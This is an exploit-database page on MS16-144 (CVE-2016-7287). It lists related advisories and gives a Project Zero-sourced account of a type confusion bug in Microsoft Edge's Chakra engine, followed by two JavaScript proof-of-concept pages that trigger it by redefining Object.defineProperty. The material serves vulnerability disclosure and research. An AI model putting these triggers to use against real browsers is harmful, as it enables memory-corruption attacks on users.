Microsoft Edge Intl. Initialization Type Confusion (MS16-144) Exploi
Reporter | Title | Published | Views | Family All 20 |
---|---|---|---|---|
Symantec | Microsoft Internet Explorer and Edge CVE-2016-7287 Remote Memory Corruption Vulnerability | 13 Dec 201600:00 | – | symantec |
Exploit DB | Microsoft Edge - Internationalization Initialization Type Confusion (MS16-144) | 21 Dec 201600:00 | – | exploitdb |
Check Point Advisories | Microsoft Browser Scripting Engine Memory Corruption (MS16-145: CVE-2016-7287) | 13 Dec 201600:00 | – | checkpoint_advisories |
Microsoft CVE | Scripting Engine Memory Corruption Vulnerability | 13 Dec 201608:00 | – | mscve |
CVE | CVE-2016-7287 | 20 Dec 201606:59 | – | cve |
Prion | Memory corruption | 20 Dec 201606:59 | – | prion |
Cvelist | CVE-2016-7287 | 20 Dec 201605:54 | – | cvelist |
NVD | CVE-2016-7287 | 20 Dec 201606:59 | – | nvd |
OpenVAS | Microsoft Internet Explorer Multiple Vulnerabilities (3204059) | 14 Dec 201600:00 | – | openvas |
OpenVAS | Microsoft Edge Multiple Vulnerabilities (3204062) | 14 Dec 201600:00 | – | openvas |
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=972
In Chakra, Internationlization is initialized the first time the Intl object is used, by executing the script in Intl.js (https://github.com/Microsoft/ChakraCore/blob/master/lib/Runtime/Library/InJavascript/Intl.js). This code attempts to prevent Object methods from being redefined by user scripts, but there are a few stray calls to Object.defineProperty in initialization. If Object.defineProperty is redefined before Intl is initialized, a user-define method can be called during initialization. If this method defines a Collator (or DateTimeFormat or NumberFormat) getter and setter on the Intl object, it can intercept what it is set to, and set it to a different value instead. This will then cause type confusion in IntlEngineInterfaceExtensionObject::deletePrototypePropertyHelper (https://github.com/Microsoft/ChakraCore/blob/master/lib/Runtime/Library/IntlEngineInterfaceExtensionObject.cpp), as this function assumes the properties of a Collator are objects, when they are not guaranteed to be. A minimal PoC is as follows, and a full PoC is attached.
var d = Object.defineProperty;
var noobj = {
get: function () {
return 0x1234567 >> 1;
},
set: function () {
}
};
function f(){
var i = Intl;
Intl = {}; // this somehow prevents an exception that prevents laoding
d(i, "Collator", noobj);
}
Object.defineProperty = f;
var q = new Intl.NumberFormat(["en"]);
</script></body></html>
-->
<html><body><script>
var d = Object.defineProperty;
var noobj = {
get: function () {
print("in get no");
return 0x1234567 >> 1;
},
set: function () {
print("in set no");
}
};
function f(...a){
var i = Intl;
Intl = {};
d(i, "Collator", noobj);
}
var pattern = {
get: function () {
return f;
},
set: function () {
}
};
Object.defineProperty(Object, "defineProperty", pattern);
var q = new Intl.NumberFormat(["en"]);
</script></body></html>
# 0day.today [2018-01-10] #
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo